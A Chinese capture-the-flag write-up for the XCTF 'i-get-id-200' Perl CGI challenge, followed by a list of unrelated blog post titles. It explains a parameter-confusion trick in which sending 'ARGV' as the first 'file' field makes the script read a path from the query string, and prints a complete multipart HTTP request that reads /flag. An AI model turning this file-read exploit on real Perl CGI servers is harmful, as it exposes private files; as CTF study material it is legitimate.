i-get-id-200

  • 题目描述

    嗯。。我刚建好了一个网站

  • 解题过程

    一共有三个页面

    • Hello World

      告诉了页面是perl写的

    • Forms

      输入name和age会返回渲染后的字符串

      搜了一下,perl不能ssti

    • File

      可以上传文件,上传成功后会打印文件内容

      感觉上传文件这里有漏洞,但是对perl环境很陌生,去看看相关的用法

    • 文件读取,并打印文件内容

      open(DATA, "<file.txt") or die "file.txt 文件无法打开, $!";
      
# DATA 为文件句柄用于读取文件
      
while(<DATA>){
      
   print "$_";
      
}

    • 文件上传

       #!/usr/bin/perl
      
 use CGI;
      
 my $cgi = new CGI;
      
 my $dir = 'sub';
      
 my $file = $cgi->param('file');
      
 $file=~m/^.*(\\|\/)(.*)/;
      
 # strip the remote path and keep the filename
      
 my $name = $2;
      
 open(LOCAL, ">$dir/$name") or print 'error';
      
 while(<$file>) {
      
    print LOCAL $_;
      
 }
      
 print $cgi->header();
      
 print $dir/$name;
      
 print "$file has been successfully uploaded... thank you.\n";enter code here

      没什么思路,去看了wp,网上wp清一色猜测后端代码。。。

      找到了源码(节选)

      if ($cgi->upload('file')) {
      
    my $file = $cgi->param('file');
      
    while (<$file>) {
      
        print "$_";
      
        print "<br />";
      
    }
      
}

      涉及几个知识点:

      • 这里需要用到ARGV,它是perl默认用来接收参数的数组,类似flask的request.argv
      • $cgi->param('file');会优先选取第一个file参数,类似于参数污染
      • 结合起来就会达到<$file> == ARGV[0]的效果,可以进行任意文件读取了
      POST /cgi-bin/file.pl?/flag HTTP/1.1
      
Host: 220.249.52.133:57967
      
Content-Length: 411
      
Cache-Control: max-age=0
      
Origin: http://220.249.52.133:57967
      
Upgrade-Insecure-Requests: 1
      
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      
Referer: http://220.249.52.133:57967/cgi-bin/file.pl?file=../file.pl
      
Accept-Encoding: gzip, deflate
      
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
      
Connection: close

------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"
      
Content-Type: text/plain

ARGV
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"; filename="draft.txt"
      
Content-Type: text/plain

asdasd
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="Submit!"

Submit!
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ--

      注意这里需要多加一组form数据来写ARGV

  • 参考

XCTF-i-get-id-200的更多相关文章

  1. [Android]Android端ORM框架——RapidORM(v2.0)

    以下内容为原创,欢迎转载,转载请注明 来自天天博客:http://www.cnblogs.com/tiantianbyconan/p/5626716.html [Android]Android端ORM ...

  2. SQL Server 深入解析索引存储(上)

    标签:SQL SERVER/MSSQL SERVER/数据库/DBA/索引体系结构/堆/聚集索引 概述 最近要分享一个课件就重新把这块知识整理了一遍出来,篇幅有点长,想要理解的透彻还是要上机实践. 聚 ...

  3. [开源ORM] SqliteSugar 3.x .net Core版本成功上线

    SqliteSqlSugar 3.X API 作为支持.NET CORE 为数不多的ORM之一,除了具有优越的性能外,还拥有强大的功能,不只是满足你的增,删,查和改.实质上拥有更多你想像不到的功能,当 ...

  4. 改善SQL语句(转)

    二.改善SQL语句          很多人不知道SQL语句在SQL SERVER中是如何执行的,他们担心自己所写的SQL语句会被SQL SERVER误解.比如:   select * from ta ...

  5. 转载:SqlServer数据库性能优化详解

    本文转载自:http://blog.csdn.net/andylaudotnet/article/details/1763573 性能调节的目的是通过将网络流通.磁盘 I/O 和 CPU 时间减到最小 ...

  6. mysql-批量修改表字段中的某一部分内容

    MySQL批量替换指定字段字符串语句(1)updat 表名 set 字段名=replac(字段名,'原来的内容','替换后的内容') 举一个例子,就是我实际操作的时候的命令: update cpg14 ...

  7. 记一次MYSQL更新优化

    引言 今天(August 5, 2015 5:34 PM)在给数据库中一张表的结构做一次调整,添加了几个字段,后面对之前的数据进行刷新,刷新的内容是:对其中的一个已有字段url进行匹配,然后更新新加的 ...

  8. A Quick Introduction to Linux Policy Routing

    A Quick Introduction to Linux Policy Routing 29 May 2013 In this post, I’m going to introduce you to ...

  9. 转载:postgresql分区与优化

    --对于分区表constraint_exclusion 这个参数需要配置为partition或on postgres=# show constraint_exclusion ; constraint_ ...

  10. 楼盘信息sq

    ID:1 楼盘名称:帝豪国际 网址:http://shangqiu.jiwu.com/loupan/239023.html 价格:2500元/平米 关注人数:497 地址:长寿大道南段 情况:在售 大 ...

随机推荐

  1. AtCoder Beginner Contest 171-175 F

    171 F - Strivore 直接把初始字符当成隔板,统计的方案数会有重复 为了避免重复情况,规定隔板字母尽可能最后出现,即在隔板字母后面不能插入含隔板字母的字符串 所以在隔板字母后插入的字符只有 ...

  2. 自动化测试工具(基于WordCount作业)

    本自动化测试的程序用于自动化测试WordCount作业,采用Java开发(基于jdk1.8+),基于Maven来管理项目. 支持的语言和开发进度 语言 进度 Java 已测试并投入运行 C++ 开发完 ...

  3. H5 简单实现打砖块游戏

    实现效果如图所示: 1.布局 在html中,声明  div1 作为作为带有边框的父物体,一切行为都要在 div1 中进行.创建小球ball.左右可滑动的板子bat,以及存放要销毁的砖块的父物体 bri ...

  4. Hibernate在oracle中ID增长的方式(续)

    引用链接:http://blog.csdn.net/w183705952/article/details/7367272 第二种:设置ID的增长策略是native,但是需要创建一个名字为hiberna ...

  5. MySql历史与架构

    MySQL 逻辑架构

  6. 怎么用Markdown在github上写书,并用pages展示

    怎么用git写书 安装环境 第一步 安装node npm 先检测自己电脑是否安装了node npm # 查看 node 版本 node -v # 查看 npm 版本 npm -v 复制代码 如果成功打 ...

  7. A Color Game

    题目大意:  给定一个只包含七种字母的字符串,如果满足一段连续相同的字符长度大于等于K那么即可消除,问最后能不能变为空字符. 题解:很明显是用区间dp来解决,我们设dp[l][r][k]代表的是在[l ...

  8. Git基本操作流程

    技术背景 Gitee是一款国内的git托管服务,对于国内用户较为友好,用户可以访问Gitee地址来创建自己的帐号和项目,并托管在Gitee平台上.既然是git的托管服务,那我们就可以先看看git的一些 ...

  9. mysql数据库忘记密码时如何修改密码

    方法/步骤  1.进入 mysql 的 bin 目录下,打开 cmd ,在此之前关闭mysql服务,并且结束mysqld.exe进程                                  ...

  10. Hashtable 渐渐被人们遗忘了,只有面试官还记得,感动

    尽人事,听天命.博主东南大学硕士在读,热爱健身和篮球,乐于分享技术相关的所见所得,关注公众号 @ 飞天小牛肉,第一时间获取文章更新,成长的路上我们一起进步 本文已收录于 「CS-Wiki」Gitee ...